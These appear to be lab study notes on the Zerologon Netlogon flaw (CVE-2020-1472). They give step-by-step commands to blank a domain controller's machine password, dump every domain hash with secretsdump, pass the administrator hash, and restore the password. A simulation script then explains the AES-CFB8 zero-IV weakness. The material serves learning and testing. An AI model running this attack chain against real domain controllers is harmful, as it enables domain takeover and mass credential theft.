Zerologon (CVE-2020-1472)
- unauthenticated Netlogon auth bypass: the exploit resets the DC machine account password to empty, so always restore the original password afterwards (see restorepassword.py below); leaving it blank breaks the DC's AD trust/replication and can take the DC down
- patched by Microsoft in the Aug 2020 updates, enforcement mode from Feb 2021; the notes below are for an unpatched lab DC (MARVEL domain, DC = HYDRA-DC)
- https://www.trendmicro.com/en_us/what-is/zerologon.html
- https://github.com/dirkjanm/CVE-2020-1472
- https://github.com/SecuraBV/CVE-2020-1472
- non-destructive check first (SecuraBV tester takes the DC NetBIOS name and its IP): python3 zerologon_tester.py HYDRA-DC <dc-ip>
- then run the dirkjanm exploit; it tries up to 2000 times and each attempt succeeds with probability 1/256, so it almost always works within a few hundred tries, but on success the DC machine account password is blanked (see above, restore it)
- python3 cve-2020-1472-exploit.py HYDRA-DC <dc-ip>
- dump the domain with the now-empty machine account password (quote the $ so the shell does not expand it; just hit Enter at the password prompt or use -no-pass): secretsdump.py -just-dc 'MARVEL/HYDRA-DC$@<dc-ip>'
- pass the hash of the domain admin from that dump to dump the DC's local registry secrets: secretsdump.py administrator@<dc-ip> -hashes <lmhash>:<nthash>
- in that output look for the DC machine account's plain_password_hex under the $MACHINE.ACC section: the LSA secret still holds the original machine password the exploit did not touch
- restore it: python3 restorepassword.py MARVEL/HYDRA-DC@HYDRA-DC -target-ip <dc-ip> -hexpass <plain_password_hex>
- verify: re-run secretsdump.py -just-dc with the empty password, it must now fail
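Why the exploit has a "very high chance of success" comes down to how ComputeNetlogonCredential encrypts the 8-byte challenge: AES-CFB8 with an all-zero IV. In CFB8 each ciphertext byte is the first byte of the block cipher applied to a 16-byte shift register (initially the IV) XORed with one plaintext byte, and that ciphertext byte is then shifted into the register. With a zero IV and a zero plaintext, a session key whose first keystream byte is 0x00 leaves the register all-zero forever and the credential comes out as eight zero bytes; that holds for about 1 in 256 keys, and the session key changes on every handshake, so sending an all-zero client challenge and an all-zero credential succeeds after ~256 attempts on average. The script below is an added example written for these notes, not code from the page or from the linked repositories. To stay dependency-free it uses HMAC-SHA256 truncated to 16 bytes as a stand-in for the AES-128 block function (the CFB8 structure, and therefore the 1/256 property, does not depend on the block cipher); the session-key derivation models the MS-NRPC AES key derivation with `machine_secret` standing in for the MD4 hash of the machine password.

```python
"""Zerologon mechanism: CFB8 with a zero IV and a zero challenge.

Added example for these notes. ASSUMPTIONS: block_encrypt is an HMAC-SHA256
stand-in for AES-128; derive_session_key models MS-NRPC's AES session-key
derivation with `machine_secret` in place of MD4(machine password).
"""
import hashlib
import hmac
import os


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in 16-byte block function (HMAC-SHA256 truncated), NOT real AES."""
    assert len(block) == 16
    return hmac.new(key, block, hashlib.sha256).digest()[:16]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Generic CFB8: one block-cipher call per plaintext byte, 1-byte feedback."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream_byte = block_encrypt(key, bytes(register))[0]
        c = p ^ keystream_byte
        out.append(c)
        register = register[1:] + bytes([c])  # shift the ciphertext byte in
    return bytes(out)


ZERO_IV = bytes(16)          # MS-NRPC fixes the CFB8 IV to all zeros
ZERO_CHALLENGE = bytes(8)    # attacker-chosen client challenge


def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """Models ComputeNetlogonCredential: CFB8 over the 8-byte challenge, IV = 0."""
    return cfb8_encrypt(session_key, ZERO_IV, challenge)


def session_key_is_weak(session_key: bytes) -> bool:
    """True when a zero challenge yields a zero credential, i.e. the first
    byte of E_k(0^16) is 0x00 so the shift register never changes."""
    return block_encrypt(session_key, ZERO_IV)[0] == 0


def find_weak_key(start: int = 0) -> bytes:
    """Deterministically find a key with the weak property (demonstration only)."""
    i = start
    while True:
        key = i.to_bytes(16, "big")
        if session_key_is_weak(key):
            return key
        i += 1


def weak_key_fraction(n_keys: int) -> float:
    """Fraction of the keys 0..n_keys-1 with the weak property; expect ~1/256."""
    weak = sum(session_key_is_weak(i.to_bytes(16, "big")) for i in range(n_keys))
    return weak / n_keys


def derive_session_key(machine_secret: bytes, client_challenge: bytes,
                       server_challenge: bytes) -> bytes:
    """Models the MS-NRPC AES session key: HMAC-SHA256 keyed with the machine
    secret over ClientChallenge || ServerChallenge, truncated to 16 bytes."""
    msg = client_challenge + server_challenge
    return hmac.new(machine_secret, msg, hashlib.sha256).digest()[:16]


def simulate_zerologon(machine_secret: bytes, max_attempts: int = 2000,
                       rng=os.urandom) -> int:
    """Attacker loop against a modelled DC. Every attempt the server picks a
    fresh random server challenge (hence a fresh session key); the attacker
    always sends an all-zero client challenge and an all-zero credential.
    Returns the attempt number that succeeded, or -1 if none did."""
    for attempt in range(1, max_attempts + 1):
        server_challenge = rng(8)
        session_key = derive_session_key(machine_secret, ZERO_CHALLENGE, server_challenge)
        expected = compute_netlogon_credential(session_key, ZERO_CHALLENGE)
        if expected == bytes(8):  # server accepts the attacker's zero credential
            return attempt
    return -1


if __name__ == "__main__":
    print("weak-key fraction over 5000 keys:", weak_key_fraction(5000))
    print("attempts needed in one simulated run:", simulate_zerologon(os.urandom(16)))
```

The simulation does not talk to a DC; it only shows why the real exploit's 2000-attempt loop is almost always enough and why the blank-password side effect follows from the same accepted zero credential.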